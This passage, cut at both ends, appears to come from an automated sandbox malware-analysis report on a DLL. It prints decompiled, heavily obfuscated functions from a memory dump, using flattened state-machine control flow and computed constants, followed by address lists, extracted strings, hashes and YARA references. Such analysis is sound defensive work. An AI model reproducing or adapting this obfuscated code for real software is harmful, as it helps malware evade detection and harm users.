				_v36 = _v36 | 0xc4a3f1ad;
				_v36 = _v36 ^ 0xc4a39a93;
				_v40 = 0x16bd;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x0016fb39;
				_v44 = 0x384e;
				_t154 = 0x3b;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00003cb9;
				_v64 = 0x6f3c;
				_v64 = _v64 + 0x49f0;
				_v64 = _v64 * 0x12;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00002a42;
				_v8 = 0x21c3;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x010e5853;
				_v12 = 0xc49d;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0x0624cbc5;
				_v16 = 0x33ea;
				_v16 = _v16 + 0xffff095d;
				_v16 = _v16 ^ 0xffff1135;
				_v56 = 0x9287;
				_v56 = _v56 * 0x3d;
				_v56 = _v56 | 0xa9bdb70a;
				_v56 = _v56 ^ 0x6edfa2bf;
				_v56 = _v56 ^ 0xc7607732;
				_t155 = _v4;
				do {
					while(_t141 != 0x213a8f08) {
						if(_t141 == 0x27f2e66a) {
							_t135 = E10012878(_t155,  &_v4, _v48, _v52, _v24);
							_t160 =  &(_t160[3]);
							if(_t135 != 0) {
								_t141 = 0x2db65059;
								continue;
							}
						} else {
							if(_t141 == 0x29395626) {
								E1000F1ED(_v8, _v12, _v16, _v56, _v4);
							} else {
								if(_t141 == 0x2a642033) {
									_t141 = 0x213a8f08;
									continue;
								} else {
									if(_t141 != 0x2db65059) {
										goto L13;
									} else {
										_t105 =  &_v64; // 0x9
										E10003850(_v4, 1, _v28, _t141, 1, _v32, _v36, _v40, _v44, _t139,  *_t105, _a8);
										_t160 =  &(_t160[0xa]);
										_t141 = 0x29395626;
										_t156 =  !=  ? 1 : _t156;
										continue;
									}
								}
							}
						}
						L16:
						return _t156;
					}
					_t134 = E1000F2AB();
					_t155 = _t134;
					if(_t134 == 0xffffffff) {
						_t141 = 0x3912b486;
						goto L13;
					} else {
						_t141 = 0x27f2e66a;
						continue;
					}
					goto L16;
					L13:
				} while (_t141 != 0x3912b486);
				goto L16;
			}

0x1000333d
0x10003343
0x10003345
0x1000334a
0x1000334b
0x1000334f
0x10003350
0x10003351
0x10003352
0x10003357
0x1000335f
0x10003362
0x1000336c
0x10003371
0x10003378
0x1000337f
0x10003382
0x10003386
0x1000338e
0x10003396
0x1000339e
0x100033a6
0x100033ae
0x100033b6
0x100033be
0x100033c6
0x100033ce
0x100033d3
0x100033db
0x100033e3
0x100033f3
0x100033f7
0x100033ff
0x10003407
0x1000340f
0x10003417
0x1000341f
0x10003424
0x1000342c
0x10003434
0x1000343c
0x10003444
0x1000344c
0x10003451
0x10003459
0x10003465
0x10003468
0x1000346c
0x10003474
0x1000347c
0x10003489
0x1000348d
0x10003492
0x1000349a
0x100034a2
0x100034a7
0x100034af
0x100034b7
0x100034bc
0x100034c4
0x100034cc
0x100034d4
0x100034dc
0x100034e9
0x100034ed
0x100034f5
0x100034fd
0x10003505
0x10003509
0x10003509
0x1000351b
0x1000358f
0x10003594
0x10003599
0x1000359b
0x00000000
0x1000359b
0x1000351d
0x10003523
0x100035ea
0x10003529
0x1000352f
0x10003576
0x00000000
0x10003531
0x10003537
0x00000000
0x1000353d
0x10003543
0x10003562
0x10003567
0x1000356a
0x10003571
0x00000000
0x10003571
0x10003537
0x1000352f
0x10003523
0x100035f3
0x100035fb
0x100035fb
0x100035ad
0x100035b2
0x100035b7
0x100035c3
0x00000000
0x100035b9
0x100035b9
0x00000000
0x100035b9
0x00000000
0x100035c8
0x100035c8
0x00000000

Strings

B*, xrefs: 10003373
X, xrefs: 10003357
3 d*, xrefs: 10003378
G, xrefs: 100033C6
3 d*, xrefs: 10003529
3, xrefs: 100034C4
&V9), xrefs: 1000356A
B*, xrefs: 100035A9, 10003543
$m, xrefs: 100033E3
B*, xrefs: 10003492
&V9), xrefs: 1000351D
N8, xrefs: 10003459

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
API String ID: 0-1096093052
Opcode ID: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
Instruction ID: 1d539aa0a827d462b2d3039748d81123eb357fc98c7332c0470dc9b2878bc9e4
Opcode Fuzzy Hash: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
Instruction Fuzzy Hash: FD6166715083419FE359CF21D88940BBFF5FBC4388F108A0DF59296264D3B6CA598B83

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6F0 Relevance: 12.9, Strings: 10, Instructions: 379
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E1000D6F0(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t364;
				void* _t401;
				signed int _t407;
				signed int _t408;
				void* _t418;
				signed int _t424;
				void* _t467;
				signed int _t477;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				intOrPtr* _t492;
				signed int* _t494;

				_push(_a24);
				_t492 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t364);
				_v1640 = _v1640 & 0x00000000;
				_t494 =  &(( &_v1792)[8]);
				_v1652 = 0x2764d0;
				_v1648 = 0x6c10e;
				_t418 = 0x1a59bf6e;
				_v1644 = 0x45b7d3;
				_v1736 = 0x69d7;
				_t479 = 0x7c;
				_v1736 = _v1736 / _t479;
				_v1736 = _v1736 ^ 0x22ae46e4;
				_v1736 = _v1736 ^ 0x22ae462e;
				_v1692 = 0x6229;
				_t480 = 0x2d;
				_v1692 = _v1692 * 0x79;
				_v1692 = _v1692 ^ 0x002e5d85;
				_v1668 = 0x3eca;
				_v1668 = _v1668 * 0x4a;
				_v1668 = _v1668 ^ 0x001246b9;
				_v1664 = 0xb443;
				_v1664 = _v1664 ^ 0x9e62129a;
				_v1664 = _v1664 ^ 0x9e62966b;
				_v1776 = 0xc910;
				_v1776 = _v1776 ^ 0xd3b19c76;
				_v1776 = _v1776 * 0x5f;
				_v1776 = _v1776 >> 4;
				_v1776 = _v1776 ^ 0x08ec90a2;
				_v1724 = 0x4482;
				_v1724 = _v1724 | 0x42708b7b;
				_v1724 = _v1724 + 0xddd;
				_v1724 = _v1724 ^ 0x4270d568;
				_v1688 = 0xa58d;
				_v1688 = _v1688 / _t480;
				_v1688 = _v1688 ^ 0x00002f12;
				_v1768 = 0x1117;
				_v1768 = _v1768 ^ 0xb27fbd06;
				_v1768 = _v1768 ^ 0xbad7b42c;
				_v1768 = _v1768 << 5;
				_v1768 = _v1768 ^ 0x1503361b;
				_v1748 = 0x59e9;
				_t481 = 0x76;
				_v1748 = _v1748 / _t481;
				_v1748 = _v1748 * 0x1b;
				_v1748 = _v1748 ^ 0x0000781f;
				_v1712 = 0x12f;
				_v1712 = _v1712 >> 1;
				_v1712 = _v1712 * 0x54;
				_v1712 = _v1712 ^ 0x000029cb;
				_v1760 = 0x769d;
				_v1760 = _v1760 ^ 0x1d97fecb;
				_v1760 = _v1760 | 0x5a049cf7;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x005fdabd;
				_v1680 = 0x560a;
				_t482 = 0x67;
				_v1680 = _v1680 / _t482;
				_v1680 = _v1680 ^ 0x00006cbe;
				_v1716 = 0x4a9b;
				_t483 = 0x3e;
				_v1716 = _v1716 / _t483;
				_v1716 = _v1716 << 2;
				_v1716 = _v1716 ^ 0x00001699;
				_v1756 = 0xfd39;
				_t484 = 0x41;
				_v1756 = _v1756 / _t484;
				_t485 = 0x3c;
				_v1756 = _v1756 / _t485;
				_v1756 = _v1756 >> 2;
				_v1756 = _v1756 ^ 0x000009f3;
				_v1656 = 0x263f;
				_v1656 = _v1656 | 0xdd3deb07;
				_v1656 = _v1656 ^ 0xdd3d9735;
				_v1728 = 0x8b60;
				_v1728 = _v1728 + 0x7c61;
				_v1728 = _v1728 >> 3;
				_v1728 = _v1728 ^ 0x00004a7c;
				_v1720 = 0x33cd;
				_v1720 = _v1720 ^ 0x1b0fa94f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 ^ 0x00d8342d;
				_v1780 = 0x296b;
				_t477 = 0xd;
				_t486 = 0x1a;
				_v1780 = _v1780 * 0x37;
				_v1780 = _v1780 / _t477;
				_v1780 = _v1780 * 0x68;
				_v1780 = _v1780 ^ 0x00477104;
				_v1708 = 0x1071;
				_v1708 = _v1708 / _t486;
				_v1708 = _v1708 ^ 0x39e628e5;
				_v1708 = _v1708 ^ 0x39e60ecd;
				_v1792 = 0xc8ec;
				_v1792 = _v1792 + 0xffff9509;
				_v1792 = _v1792 << 0x10;
				_v1792 = _v1792 / _t477;
				_v1792 = _v1792 ^ 0x073a38a1;
				_v1672 = 0xf01f;
				_v1672 = _v1672 | 0x8a618a9f;
				_v1672 = _v1672 ^ 0x8a61a479;
				_v1772 = 0x51a6;
				_v1772 = _v1772 << 2;
				_t487 = 0x2c;
				_v1772 = _v1772 / _t487;
				_v1772 = _v1772 >> 5;
				_v1772 = _v1772 ^ 0x000035c3;
				_v1764 = 0xe721;
				_v1764 = _v1764 ^ 0x24f6807f;
				_t488 = 0x53;
				_v1764 = _v1764 / _t488;
				_v1764 = _v1764 + 0xbfd3;
				_v1764 = _v1764 ^ 0x00728456;
				_v1660 = 0x1e86;
				_v1660 = _v1660 ^ 0x7c17f37e;
				_v1660 = _v1660 ^ 0x7c17e05e;
				_v1684 = 0xd777;
				_v1684 = _v1684 + 0xed5a;
				_v1684 = _v1684 ^ 0x0001edaa;
				_v1744 = 0xa784;
				_v1744 = _v1744 + 0xc02;
				_t489 = 0x29;
				_v1744 = _v1744 / _t489;
				_v1744 = _v1744 ^ 0x000021c6;
				_v1696 = 0xdd82;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 ^ 0x006e89a7;
				_v1784 = 0x58c6;
				_v1784 = _v1784 << 0xd;
				_v1784 = _v1784 * 0x62;
				_v1784 = _v1784 ^ 0x296c6eed;
				_v1784 = _v1784 ^ 0x1615de11;
				_v1676 = 0x84dc;
				_v1676 = _v1676 << 1;
				_v1676 = _v1676 ^ 0x00016dc5;
				_v1740 = 0x8068;
				_v1740 = _v1740 | 0xa8a101a8;
				_v1740 = _v1740 >> 5;
				_v1740 = _v1740 ^ 0x0545556d;
				_v1732 = 0x2f98;
				_v1732 = _v1732 ^ 0x2890ad27;
				_v1732 = _v1732 >> 0xe;
				_v1732 = _v1732 ^ 0x0000a37e;
				_v1788 = 0x1e3f;
				_v1788 = _v1788 >> 5;
				_v1788 = _v1788 | 0x9899bc79;
				_v1788 = _v1788 ^ 0x98e78ce9;
				_v1788 = _v1788 ^ 0x007e0a8e;
				_v1700 = 0x100b;
				_v1700 = _v1700 | 0xf8dcacc8;
				_v1700 = _v1700 ^ 0xf8dcd529;
				_t478 = _v1700;
				_v1752 = 0x332;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 + 0x818f;
				_v1752 = _v1752 << 9;
				_v1752 = _v1752 ^ 0x342347ac;
				_v1704 = 0xaa58;
				_v1704 = _v1704 >> 8;
				_v1704 = _v1704 * 0x6a;
				_v1704 = _v1704 ^ 0x000062e9;
				while(1) {
					L1:
					_t467 = 0x2e;
					L2:
					while(_t418 != 0x15b4e3) {
						if(_t418 == 0xae29669) {
							__eflags = _v1636 & _v1736;
							if(__eflags == 0) {
								_t407 =  *_t492( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t424 =  ~_t407 & 0x021254c5;
								L9:
								_t418 = _t424 + 0x2bde9c80;
								while(1) {
									L1:
									_t467 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t467;
							if(_v1592 != _t467) {
								L19:
								__eflags = _a20;
								if(__eflags != 0) {
									_push(0x100013dc);
									_push(_v1780);
									_push(_v1720);
									E1000A4D7(__eflags, _v1792, _v1672, _v1772, _v1764, E10005DFC(_v1656, _v1728, __eflags), _a24,  &_v524,  &_v1592);
									E1000D6F0(_t492, _v1660, _v1684, _v1744, _a12, _v1696, _a20,  &_v524);
									_t408 = E10010D6D(_v1784, _v1676, _v1740, _t411);
									_t494 =  &(_t494[0x13]);
									_t467 = 0x2e;
								}
								L18:
								_t418 = 0x2df0f145;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v1590 - _t467;
							if(_v1590 != _t467) {
								goto L19;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t418 == 0xe2dbff4) {
							_t408 = E10019952( &_v1636,  &_v1044, _v1716, _v1756);
							_t478 = _t408;
							__eflags = _t408 - 0xffffffff;
							if(__eflags == 0) {
								return _t408;
							}
							_t418 = 0xae29669;
							goto L1;
						}
						if(_t418 == 0x1a59bf6e) {
							_t418 = 0x15b4e3;
							continue;
						}
						if(_t418 == 0x2bde9c80) {
							return E1000991E(_v1700, _v1752, _t478, _v1704);
						}
						if(_t418 != 0x2df0f145) {
							L23:
							__eflags = _t418 - 0xd3f8960;
							if(__eflags != 0) {
								continue;
							}
							return _t408;
						}
						_t408 = E1000327F(_t478, _v1732,  &_v1636, _v1788);
						asm("sbb ecx, ecx");
						_t424 =  ~_t408 & 0xdf03f9e9;
						goto L9;
					}
					_push(0x1000140c);
					_push(_v1776);
					_push(_v1664);
					_t401 = E10005DFC(_v1692, _v1668, __eflags);
					E1000ECBD(_v1724, __eflags, _v1692, _v1688, _v1768,  &_v1044, _v1748, _a24);
					E10010D6D(_v1712, _v1760, _v1680, _t401);
					_t494 =  &(_t494[0xb]);
					_t418 = 0xe2dbff4;
					_t467 = 0x2e;
					goto L23;
				}
			}

0x1000d6f9
0x1000d700
0x1000d702
0x1000d709
0x1000d710
0x1000d717
0x1000d71e
0x1000d725
0x1000d726
0x1000d727
0x1000d72c
0x1000d734
0x1000d737
0x1000d744
0x1000d74f
0x1000d754
0x1000d75f
0x1000d76d
0x1000d772
0x1000d778
0x1000d780
0x1000d788
0x1000d795
0x1000d798
0x1000d79c
0x1000d7a4
0x1000d7b7
0x1000d7be
0x1000d7c9
0x1000d7d4
0x1000d7df
0x1000d7ea
0x1000d7f2
0x1000d7ff
0x1000d803
0x1000d808
0x1000d810
0x1000d818
0x1000d820
0x1000d828
0x1000d830
0x1000d840
0x1000d844
0x1000d84c
0x1000d854
0x1000d85c
0x1000d864
0x1000d869
0x1000d871
0x1000d87d
0x1000d880
0x1000d889
0x1000d88d
0x1000d895
0x1000d89d
0x1000d8a6
0x1000d8aa
0x1000d8b2
0x1000d8ba
0x1000d8c2
0x1000d8ca
0x1000d8cf
0x1000d8d9
0x1000d8e7
0x1000d8ec
0x1000d8f0
0x1000d8f8
0x1000d906
0x1000d90b
0x1000d90f
0x1000d914
0x1000d91c
0x1000d92a
0x1000d92f
0x1000d939
0x1000d93e
0x1000d942
0x1000d947
0x1000d94f
0x1000d95a
0x1000d965
0x1000d970
0x1000d978
0x1000d980
0x1000d985
0x1000d98d
0x1000d995
0x1000d99d
0x1000d9a2
0x1000d9aa
0x1000d9b9
0x1000d9bc
0x1000d9bd
0x1000d9c9
0x1000d9d4
0x1000d9d8
0x1000d9e0
0x1000d9f0
0x1000d9f4
0x1000d9fc
0x1000da04
0x1000da0c
0x1000da14
0x1000da1f
0x1000da23
0x1000da2b
0x1000da36
0x1000da41
0x1000da4c
0x1000da54
0x1000da5f
0x1000da64
0x1000da6a
0x1000da6f
0x1000da77
0x1000da7f
0x1000da8b
0x1000da90
0x1000da96
0x1000da9e
0x1000daa6
0x1000dab1
0x1000dabc
0x1000dac7
0x1000dacf
0x1000dad7
0x1000dadf
0x1000dae7
0x1000daf3
0x1000daf6
0x1000dafa
0x1000db02
0x1000db0a
0x1000db0f
0x1000db17
0x1000db1f
0x1000db29
0x1000db2d
0x1000db35
0x1000db3d
0x1000db48
0x1000db4f
0x1000db5a
0x1000db62
0x1000db6a
0x1000db6f
0x1000db77
0x1000db7f
0x1000db87
0x1000db8c
0x1000db94
0x1000db9c
0x1000dba1
0x1000dba9
0x1000dbb1
0x1000dbb9
0x1000dbc1
0x1000dbc9
0x1000dbd1
0x1000dbd5
0x1000dbdd
0x1000dbe2
0x1000dbea
0x1000dbef
0x1000dbf7
0x1000dbff
0x1000dc09
0x1000dc0d
0x1000dc15
0x1000dc15
0x1000dc17
0x00000000
0x1000dc18
0x1000dc2a
0x1000dcc2
0x1000dcc9
0x1000ddcb
0x1000ddd1
0x1000ddd3
0x1000dc7d
0x1000dc7d
0x1000dc15
0x1000dc15
0x1000dc17
0x00000000
0x1000dc17
0x1000dc15
0x1000dccf
0x1000dcd7
0x1000dd03
0x1000dd03
0x1000dd0b
0x1000dd0d
0x1000dd12
0x1000dd16
0x1000dd61
0x1000dd97
0x1000ddac
0x1000ddb1
0x1000ddb6
0x1000ddb6
0x1000dcf9
0x1000dcf9
0x00000000
0x1000dcf9
0x1000dcd9
0x1000dce2
0x00000000
0x00000000
0x1000dce4
0x1000dcec
0x00000000
0x00000000
0x1000dcee
0x1000dcf7
0x00000000
0x00000000
0x00000000
0x1000dcf7
0x1000dc36
0x1000dca2
0x1000dca7
0x1000dcab
0x1000dcae
0x1000de78
0x1000de78
0x1000dcb4
0x00000000
0x1000dcb4
0x1000dc3e
0x1000dc85
0x00000000
0x1000dc85
0x1000dc46
0x00000000
0x1000de6e
0x1000dc52
0x1000de4d
0x1000de4d
0x1000de53
0x00000000
0x00000000
0x00000000
0x1000de53
0x1000dc6a
0x1000dc75
0x1000dc77
0x00000000
0x1000dc77
0x1000ddde
0x1000dde3
0x1000dde7
0x1000ddf9
0x1000de28
0x1000de3d
0x1000de42
0x1000de45
0x1000de4c
0x00000000
0x1000de4c

Strings

!, xrefs: 1000DA77
)b, xrefs: 1000D788
?&, xrefs: 1000D94F
k), xrefs: 1000D9AA
b, xrefs: 1000DC0D
nl), xrefs: 1000DB2D
Y, xrefs: 1000D871
|J, xrefs: 1000D985
Z, xrefs: 1000DACF
(9, xrefs: 1000D9F4

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !$)b$?&$Z$k)$|J$(9$Y$b$nl)
API String ID: 0-1587503975
Opcode ID: 580587c096f3035fbf2e502d4bd2291c385b4431ad385d23198ab86aefb6797d
Instruction ID: 509995259a6b8c5da35a9db8ce069ac393c3c571058edee6da8b22e2be48c384
Opcode Fuzzy Hash: 580587c096f3035fbf2e502d4bd2291c385b4431ad385d23198ab86aefb6797d
Instruction Fuzzy Hash: 8A0212715083819FE368DF25C58AA4FBBE1FBC4748F10891EF199862A0D7B99549CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001AA7B Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001AA7B(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char* _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				void* _t311;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t342;
				void* _t344;
				intOrPtr _t346;
				signed int _t348;
				signed int _t352;
				intOrPtr* _t360;
				signed int _t362;
				intOrPtr* _t366;
				intOrPtr _t368;
				intOrPtr* _t373;
				char* _t403;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				char* _t414;
				void* _t415;
				intOrPtr* _t422;
				void* _t424;
				void* _t426;

				_t366 = _a8;
				_push(_t366);
				_push(_a4);
				_t422 = __ecx;
				_push(__edx);
				_push(__ecx);
				E10012550(_t311);
				_v240 = 0x8d7c;
				_t424 =  &_v252 + 0x10;
				_t368 = 0;
				_t415 = 0x41ccc75;
				_v252 = 0;
				_t405 = 0x25;
				_v240 = _v240 / _t405;
				_t406 = 0x2f;
				_v240 = _v240 / _t406;
				_v240 = _v240 << 2;
				_v240 = _v240 ^ 0x00000010;
				_v224 = 0x614;
				_v224 = _v224 + 0xffff1e90;
				_v224 = _v224 >> 9;
				_v224 = _v224 + 0x14db;
				_v224 = _v224 ^ 0x0080146f;
				_v168 = 0x43df;
				_v168 = _v168 + 0xffffc722;
				_v168 = _v168 ^ 0xb717614c;
				_v168 = _v168 ^ 0xb71706dd;
				_v176 = 0xf537;
				_v176 = _v176 + 0xffffdb03;
				_v176 = _v176 | 0xc83cfdf5;
				_v176 = _v176 ^ 0xc83cf680;
				_v156 = 0x6ab9;
				_v156 = _v156 >> 4;
				_v156 = _v156 ^ 0x00005a76;
				_v212 = 0x1163;
				_v212 = _v212 + 0xb834;
				_v212 = _v212 | 0x5ab100ea;
				_v212 = _v212 << 0x10;
				_v212 = _v212 ^ 0xc9ff2941;
				_v184 = 0x14b7;
				_v184 = _v184 + 0xffff4460;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x007fa2da;
				_v220 = 0xa2fe;
				_v220 = _v220 ^ 0x26ae9f9f;
				_v220 = _v220 + 0x1a1;
				_v220 = _v220 + 0xce68;
				_v220 = _v220 ^ 0x26af665c;
				_v228 = 0x162a;
				_v228 = _v228 ^ 0x1700eeb5;
				_v228 = _v228 << 1;
				_v228 = _v228 ^ 0x4a6b2f0a;
				_v228 = _v228 ^ 0x646a9864;
				_v136 = 0x1819;
				_v136 = _v136 * 0x25;
				_v136 = _v136 ^ 0x000331ed;
				_v160 = 0x36ca;
				_v160 = _v160 ^ 0xc92c8b7e;
				_v160 = _v160 ^ 0xc92cce0d;
				_v148 = 0xc5b6;
				_v148 = _v148 * 0x7e;
				_v148 = _v148 ^ 0x00614dee;
				_v140 = 0xa97e;
				_v140 = _v140 + 0xa055;
				_v140 = _v140 ^ 0x000126a3;
				_v172 = 0xe032;
				_v172 = _v172 * 0x70;
				_v172 = _v172 << 9;
				_v172 = _v172 ^ 0xc42bfcc6;
				_v216 = 0xe61f;
				_v216 = _v216 | 0xbe443d33;
				_v216 = _v216 ^ 0x414ec713;
				_t407 = 0x43;
				_v216 = _v216 / _t407;
				_v216 = _v216 ^ 0x03ce199c;
				_v192 = 0x9a2f;
				_v192 = _v192 | 0xaa1149b7;
				_v192 = _v192 ^ 0x2682361c;
				_v192 = _v192 ^ 0x8c93a9a4;
				_v152 = 0x8d56;
				_t408 = 0x7f;
				_v152 = _v152 * 0x29;
				_v152 = _v152 ^ 0x0016ef6a;
				_v236 = 0xbc0b;
				_v236 = _v236 << 0xd;
				_v236 = _v236 + 0xffff7a12;
				_v236 = _v236 << 6;
				_v236 = _v236 ^ 0xe036fcaf;
				_v144 = 0x49e;
				_v144 = _v144 / _t408;
				_v144 = _v144 ^ 0x000069ed;
				_v244 = 0x2abb;
				_t409 = 0x6f;
				_v244 = _v244 / _t409;
				_v244 = _v244 + 0xffff3ff3;
				_v244 = _v244 << 7;
				_v244 = _v244 ^ 0xffa00c82;
				_v232 = 0x26d8;
				_v232 = _v232 + 0xffffe69b;
				_v232 = _v232 + 0x4f22;
				_t410 = 0x3c;
				_v232 = _v232 / _t410;
				_v232 = _v232 ^ 0x00004984;
				_v188 = 0x4ffd;
				_v188 = _v188 | 0xb7e6561e;
				_v188 = _v188 >> 0xc;
				_v188 = _v188 ^ 0x000b053b;
				_v180 = 0x9e1b;
				_v180 = _v180 + 0xffffc996;
				_v180 = _v180 | 0x10dfcda5;
				_v180 = _v180 ^ 0x10dfd69b;
				_v196 = 0x4e8f;
				_t411 = 0x74;
				_v196 = _v196 / _t411;
				_v196 = _v196 + 0xe77b;
				_v196 = _v196 ^ 0x0000e576;
				_v132 = 0xd692;
				_t412 = 0x77;
				_v132 = _v132 / _t412;
				_v132 = _v132 ^ 0x0000067d;
				_v164 = 0xe38a;
				_t413 = 0x1d;
				_t414 = _v124;
				_v164 = _v164 / _t413;
				_v164 = _v164 ^ 0x0000547b;
				_v208 = 0x28b1;
				_v208 = _v208 + 0xffff4814;
				_v208 = _v208 << 9;
				_v208 = _v208 ^ 0xfee1d162;
				_v200 = 0x7d21;
				_v200 = _v200 ^ 0x0b7eb81b;
				_v200 = _v200 | 0x5335bde4;
				_v200 = _v200 ^ 0x5b7f914c;
				_v204 = 0xd16;
				_v204 = _v204 + 0xffff7a95;
				_v204 = _v204 + 0xffffd877;
				_v204 = _v204 ^ 0xffff6023;
				while(1) {
					L1:
					_t398 = _v248;
					do {
						while(1) {
							L2:
							_t426 = _t415 - 0x994cea2;
							if(_t426 > 0) {
								break;
							}
							if(_t426 == 0) {
								E10010FE4(_t368, _v128);
								_t415 = 0x15dfcb81;
								goto L9;
							} else {
								if(_t415 == 0x1d2cb9a) {
									_v116 = 0x6c;
									_t340 =  *0x10020400; // 0x0
									_t341 =  *0x10020400; // 0x0
									_t342 = E1001C3F6(_v236, _v240,  *((intOrPtr*)(_t341 + 0x18)), _v204, _v144, _v244, _v232, _v188,  *((intOrPtr*)(_t340 + 0x10)),  &_v108,  &_v116);
									_t424 = _t424 + 0x24;
									if(_t342 == 0) {
										_t415 = 0x994cea2;
									} else {
										_t373 =  &_v1;
										_t403 = _t414;
										do {
											 *_t403 =  *_t373;
											_t403 = _t403 + 1;
											_t373 = _t373 - 1;
										} while (_t373 >=  &_v96);
										_t415 = 0x479469f;
									}
									goto L9;
								} else {
									if(_t415 == 0x41ccc75) {
										_t415 = 0x2c907ec6;
										continue;
									} else {
										if(_t415 == 0x479469f) {
											_v112 = 0x14;
											_t263 = _t414 + 0x60; // 0x60
											_t344 = E100097D9(_t263, _v128, _t368, _v180,  &_v112, _v196, _v132, _v224, _v164);
											_t368 = _v252;
											_t424 = _t424 + 0x1c;
											_t398 = _v248;
											if(_t344 == 0) {
												continue;
											} else {
												_t415 = 0x994cea2;
												_t368 = 1;
												_v252 = 1;
												goto L1;
											}
											L34:
										} else {
											if(_t415 != 0x65513b8) {
												goto L32;
											} else {
												_t346 =  *0x10020400; // 0x0
												_t348 = E100131B5(_v124,  &_v120, _v140, _v172, _v128, _v216, _t368, _t398, _v192, _v152,  *((intOrPtr*)(_t346 + 0x10)));
												_t424 = _t424 + 0x28;
												asm("sbb esi, esi");
												_t415 = ( ~_t348 & 0xf83dfcf8) + 0x994cea2;
												L9:
												_t368 = _v252;
												while(1) {
													L1:
													_t398 = _v248;
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L33;
						}
						if(_t415 == 0x15dfcb81) {
							if(_t368 == 0) {
								E1000DE81(_v156,  *_t366, _v212);
								_t368 = _v252;
							}
							_t415 = 0x1160f48c;
							goto L32;
						} else {
							if(_t415 == 0x269afaf2) {
								E10006374(_v160, _t398, _a4,  *_t422, _v148);
								_t424 = _t424 + 0xc;
								_t415 = 0x65513b8;
								goto L9;
							} else {
								if(_t415 == 0x2c907ec6) {
									_t352 = _a4 + 1;
									if((_t352 & 0x0000000f) != 0) {
										_t352 = (_t352 & 0xfffffff0) + 0x10;
									}
									 *((intOrPtr*)(_t366 + 4)) = _t352 + 0x74;
									_push(_t368);
									_t414 = E100054FB( *((intOrPtr*)(_t366 + 4)));
									 *_t366 = _t414;
									if(_t414 != 0) {
